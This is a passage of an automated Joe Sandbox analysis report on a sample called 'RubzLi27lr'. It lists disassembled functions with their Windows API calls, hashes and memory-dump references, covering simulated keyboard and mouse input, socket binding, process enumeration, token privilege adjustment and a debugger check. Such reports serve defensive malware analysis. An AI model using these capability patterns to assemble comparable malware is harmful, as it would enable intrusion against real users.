                                                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B32355
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B32381
                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B323DF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2387181109-0
                                                                                                                  • Opcode ID: bed7446012936dbf4b50a3dc6082278029175c5fcc659074840f5a0bab4a026b
                                                                                                                  • Instruction ID: 87f874a9e37411869da50dfa05d2e0820f1386ee942cafe81503335a60efa44e
                                                                                                                  • Opcode Fuzzy Hash: bed7446012936dbf4b50a3dc6082278029175c5fcc659074840f5a0bab4a026b
                                                                                                                  • Instruction Fuzzy Hash: B3313132505315AFCB20DF14D849F9BBBE9FF84710F100919F999A7181CB30EA08CB92
                                                                                                                  Function 00B29B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B29B78
                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B29C8B
                                                                                                                    • Part of subcall function 00B23874: GetInputState.USER32 ref: 00B238CB
                                                                                                                    • Part of subcall function 00B23874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B23966
                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B29BA8
                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B29C75
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1972594611-438819550
                                                                                                                  • Opcode ID: ef403f75dcaed3a4a201a653c63ef354f6356f250f406b9d52028e9a80a49f23
                                                                                                                  • Instruction ID: 1fd0455bb884006c2f1698d13562ba8a4c484b07f970f27914391d9909684086
                                                                                                                  • Opcode Fuzzy Hash: ef403f75dcaed3a4a201a653c63ef354f6356f250f406b9d52028e9a80a49f23
                                                                                                                  • Instruction Fuzzy Hash: 52416071905219AFDF55DFA4D989AEE7BF8FF05310F24409AE409A6191EB309E84CF60
                                                                                                                  Function 00AB8060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 014100614100614100814100914100414100d14100e14100014100b14100a14100614100c141000141000141000141000141000141000141006141006141008141$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                  • API String ID: 0-3703302220
                                                                                                                  • Opcode ID: 1c5d0364e98c165394fcd2af8df760a2ef3fd188e206eba06d573a192e53764f
                                                                                                                  • Instruction ID: d1e8a0ae84389079bdbf6cfbf6ee48b4e3fc3744657e87bb0278103c1308de1e
                                                                                                                  • Opcode Fuzzy Hash: 1c5d0364e98c165394fcd2af8df760a2ef3fd188e206eba06d573a192e53764f
                                                                                                                  • Instruction Fuzzy Hash: 5EA26D70E0061ACBDF24CF98C9507FDB7B9BF54314F2481A9EA15AB286EB749D81CB50
                                                                                                                  Function 00AC997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AC9A4E
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00AC9B23
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00AC9B36
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$LongProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3131106179-0
                                                                                                                  • Opcode ID: 41827d727d60b26afb0c80d0c750eccaf2376a5195e555d325a3ec3889406c50
                                                                                                                  • Instruction ID: 377dfdc701e0c792a8ea6afe4850908963df7c044ef1d0e85f770a03fd5b2425
                                                                                                                  • Opcode Fuzzy Hash: 41827d727d60b26afb0c80d0c750eccaf2376a5195e555d325a3ec3889406c50
                                                                                                                  • Instruction Fuzzy Hash: D8A11B71549444BEE7259B2C8C8DF7B6AEDEB42380F16418DF402DA5E1CE25AE02D375
                                                                                                                  Function 00B31806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
                                                                                                                    • Part of subcall function 00B3304E: _wcslen.LIBCMT ref: 00B3309B
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B3185D
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31884
                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00B318DB
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B318E6
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B31915
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1601658205-0
                                                                                                                  • Opcode ID: c074e8a7b7eec98129918450823d7eb4e8033ebb4b60d57ce60f706368d74265
                                                                                                                  • Instruction ID: 809fd22259a827bfa46df0c3f9d5f0b2badcc21f8008f65aee5e2ff2d3463d09
                                                                                                                  • Opcode Fuzzy Hash: c074e8a7b7eec98129918450823d7eb4e8033ebb4b60d57ce60f706368d74265
                                                                                                                  • Instruction Fuzzy Hash: CC51B375A00200AFDB10AF24C986F7A77E9EB45718F18859CF9065F3D3CB75AD418BA1
                                                                                                                  Function 00B41C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 292994002-0
                                                                                                                  • Opcode ID: 65c61f6c1e53d838aff3fbdaa4345e428f0fedadd0e4a6cae99d1c9641cdeadd
                                                                                                                  • Instruction ID: 5af4590a94eaa8ed13999444a3f4f15e860e02afb526ab1d7c5e62e679fe07ac
                                                                                                                  • Opcode Fuzzy Hash: 65c61f6c1e53d838aff3fbdaa4345e428f0fedadd0e4a6cae99d1c9641cdeadd
                                                                                                                  • Instruction Fuzzy Hash: 4821D631B412105FD7208F2EDC84B6A7BE5FF85715B1984A8E8458F352CB71DE82DB90
                                                                                                                  Function 00B3A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B3A6AC
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B3A6BA
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00B3A79C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3A7AB
                                                                                                                    • Part of subcall function 00ACCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AF3303,?), ref: 00ACCE8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1991900642-0
                                                                                                                  • Opcode ID: 1d24d842f7af1be4f1fe5087404feef3d503060d51b3a87bbaa1e0430796cb0f
                                                                                                                  • Instruction ID: 44587f89dbedee93d45103cfb6759290286380fe35c72b7bf164c8b1d5f92be2
                                                                                                                  • Opcode Fuzzy Hash: 1d24d842f7af1be4f1fe5087404feef3d503060d51b3a87bbaa1e0430796cb0f
                                                                                                                  • Instruction Fuzzy Hash: 20514D75508300AFD710EF24C986EABBBE8FF89754F50495DF58997252EB30D904CB92
                                                                                                                  Function 00B1AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B1AAAC
                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 00B1AAC8
                                                                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B1AB36
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B1AB88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: 6d86a283ab153ba51fb7304f63341be8d131bf0c1fb03478a82581b0a46145c6
                                                                                                                  • Instruction ID: 5806d2c6d30066e5b4bb83b9ee3ae010e63598ce5da010d3219533ed4246b893
                                                                                                                  • Opcode Fuzzy Hash: 6d86a283ab153ba51fb7304f63341be8d131bf0c1fb03478a82581b0a46145c6
                                                                                                                  • Instruction Fuzzy Hash: DC314870A46288AEFB30CB64CC05BFB7BE6EF45310F84429AF181521D0C374AAC1C762
                                                                                                                  Function 00B2CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B2CE89
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00B2CEEA
                                                                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 00B2CEFE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 234945975-0
                                                                                                                  • Opcode ID: eb1a30c828787041e84bdb997f7f0cda2230ba9f937baec47252be27a685fc37
                                                                                                                  • Instruction ID: bd01d2997ba72385a178536661a65f4a31be882efa58f729cdcecfe22e6894bb
                                                                                                                  • Opcode Fuzzy Hash: eb1a30c828787041e84bdb997f7f0cda2230ba9f937baec47252be27a685fc37
                                                                                                                  • Instruction Fuzzy Hash: E921CFB15007159BDB20EFA5EA88BAB7BFCEB00758F10445EE54AD2151EB74EE098B50
                                                                                                                  Function 00B18298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B182AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen
                                                                                                                  • String ID: ($|
                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                  • Opcode ID: 6d70689dd5d5de06942b50b86609a77b58a70131d9c41ec774ed9651d8cd006b
                                                                                                                  • Instruction ID: c98c56f71d371ae1260ffe71335c502816c03a8abf683fe8403d4f9a23e29e15
                                                                                                                  • Opcode Fuzzy Hash: 6d70689dd5d5de06942b50b86609a77b58a70131d9c41ec774ed9651d8cd006b
                                                                                                                  • Instruction Fuzzy Hash: 75323875A007059FC728CF19D0809AAB7F1FF48710B55C5AEE49ADB3A1EB70E981CB44
                                                                                                                  Function 00B25C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B25CC1
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B25D17
                                                                                                                  • FindClose.KERNEL32(?), ref: 00B25D5F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3541575487-0
                                                                                                                  • Opcode ID: 0c6c9792e97f6411548d2a0fba77fb814d81e06f236a66524ccb88adb6d82ac6
                                                                                                                  • Instruction ID: a8778947b805cce3238a35d2cbf13c975ed9a511029beec1766272b0c8b707d8
                                                                                                                  • Opcode Fuzzy Hash: 0c6c9792e97f6411548d2a0fba77fb814d81e06f236a66524ccb88adb6d82ac6
                                                                                                                  • Instruction Fuzzy Hash: 3D519934604A019FC724CF28D494E9AB7E4FF49324F1485AEE95A8B3A2DB30ED45CF91
                                                                                                                  Function 00AE2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00AE271A
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AE2724
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00AE2731
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: 4141fef7a62390cd4ad881b2af5b806ac41f53d9d969570784c2966bc4315164
                                                                                                                  • Instruction ID: 26e90a6006fec188a9dce4cb45f54569855c203fcd5c85059b404379314d0362
                                                                                                                  • Opcode Fuzzy Hash: 4141fef7a62390cd4ad881b2af5b806ac41f53d9d969570784c2966bc4315164
                                                                                                                  • Instruction Fuzzy Hash: F231D5749012189BCB21DF64DD88BDDBBB8BF08750F5041EAE40CA7260EB709F818F44
                                                                                                                  Function 00B251CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B251DA
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B25238
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00B252A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  • Opcode ID: 6eac1137b9081d23797d701284c2ab731cad2f0c1e5fcc9d3f00469cbcb1c973
                                                                                                                  • Instruction ID: 383090690ebd625adb4fcc08ce397e0430b0a0db667c4d63cd5099b4a6365354
                                                                                                                  • Opcode Fuzzy Hash: 6eac1137b9081d23797d701284c2ab731cad2f0c1e5fcc9d3f00469cbcb1c973
                                                                                                                  • Instruction Fuzzy Hash: B1314C75A00618DFDB00DF54D884EADBBF4FF49314F148099E809AB3A2DB31E955CB90
                                                                                                                  Function 00B116C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00ACFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0668
                                                                                                                    • Part of subcall function 00ACFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0685
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
                                                                                                                  • GetLastError.KERNEL32 ref: 00B1174A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 577356006-0
                                                                                                                  • Opcode ID: f3e02fc21db5b9d4cb209265972ea0bb876637b7b65fb5a0893bc1c8759a81ee
                                                                                                                  • Instruction ID: 6896f920bdbf75113cce485ad984cfe80bf2d6fe4e7496d6536ba79e25b7365d
                                                                                                                  • Opcode Fuzzy Hash: f3e02fc21db5b9d4cb209265972ea0bb876637b7b65fb5a0893bc1c8759a81ee
                                                                                                                  • Instruction Fuzzy Hash: CF11C1B2400304AFD7189F54DCC6EAABBF9FB04714B20856EE05657291EB70BC818A24
                                                                                                                  Function 00B1D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B1D608
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B1D645
                                                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B1D650
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
